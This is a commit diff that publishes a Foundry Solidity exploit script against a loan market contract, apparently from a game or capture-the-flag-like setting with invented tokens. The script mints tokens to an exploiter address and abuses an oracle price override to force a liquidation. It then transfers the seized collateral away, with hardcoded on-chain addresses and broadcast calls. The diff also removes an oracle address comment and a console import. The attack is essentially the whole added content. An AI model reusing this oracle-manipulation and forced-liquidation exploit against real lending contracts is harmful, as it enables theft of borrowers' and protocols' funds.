Open source the exploit code

script/Exploit.s.sol

@@ -0,0 +1,44 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.13;
+
+import "forge-std/Script.sol";
+import "../src/BFKLoanMarket.sol";
+import "../src/Jungfrau.sol";
+import "../src/Blemflarck.sol";
+
+contract Exploit is Script {
+    uint256 public constant AMOUNT = 42 * 10**18;
+
+    function run() external {
+        //uint256 deployerPrivateKey = vm.envUint("PRIVATE_KEY");
+        address loanTaker = 0x02B2017c737aDC3DbAaA77bE0897A0EA76d87d4c;
+        address exploiter = 0x08A2DE6F3528319123b25935C92888B16db8913E;
+        address communalAddress = 0xbd3CaD62221E2eEDAa2e5E5C88B1DF9b0300625c;
+
+        address loanMarketAddress = 0x3107C21EDCE855c9d9F012728A463bBC3fA7C5b5;
+        address jungfrauAddress = 0x0353beFC11c14383D5C043a8E38927a7137e46E8;
+        address blemflarckAddress = 0x73A41fDf851a5Bcf31Db9410c32d2cF63f98C89d;
+
+        BFKLoanMarket bfkLoanMarket = BFKLoanMarket(loanMarketAddress);
+        Jungfrau jungfrau = Jungfrau(jungfrauAddress);
+        Blemflarck blemflarck = Blemflarck(blemflarckAddress);
+
+        // Deploy the token contracts with the deployer key that isn't compromised
+        vm.startBroadcast();
+
+        // Mint the exploiter some jungfrau
+        jungfrau.mint(exploiter, AMOUNT);
+
+        // Approve the loan contract to move the liquidator's funds
+        jungfrau.approve(address(bfkLoanMarket), AMOUNT / 3);
+
+        // Should be able to liquidate by updating the oracle override
+        bfkLoanMarket.updatePrice(1);
+        bfkLoanMarket.liquidate(loanTaker, exploiter, AMOUNT / 3);
+
+        uint256 balance = blemflarck.balanceOf(exploiter);
+        blemflarck.transfer(communalAddress, balance);
+
+        vm.stopBroadcast();
+    }
+}

src/BFKLoanMarket.sol

@@ -4,7 +4,6 @@ pragma solidity ^0.8.10;
 import "@solmate/auth/Owned.sol";
 import "./interfaces/IPriceOracle.sol";
 import "@solmate/tokens/ERC20.sol";
-import "forge-std/console.sol";
 
 /**
  * STEAL THEIR BLEMFLARCK! DEATH TO EIGER!
@@ -38,7 +37,6 @@ contract BFKLoanMarket is Owned(msg.sender) {
     ) {
         blemflarck = ERC20(bfk);
         jungfrau = ERC20(jfr);
-        // 0x7d7356bF6Ee5CDeC22B216581E48eCC700D0497A EUR/USD
         oracle = IPriceOracle(priceOracleAddress);
     }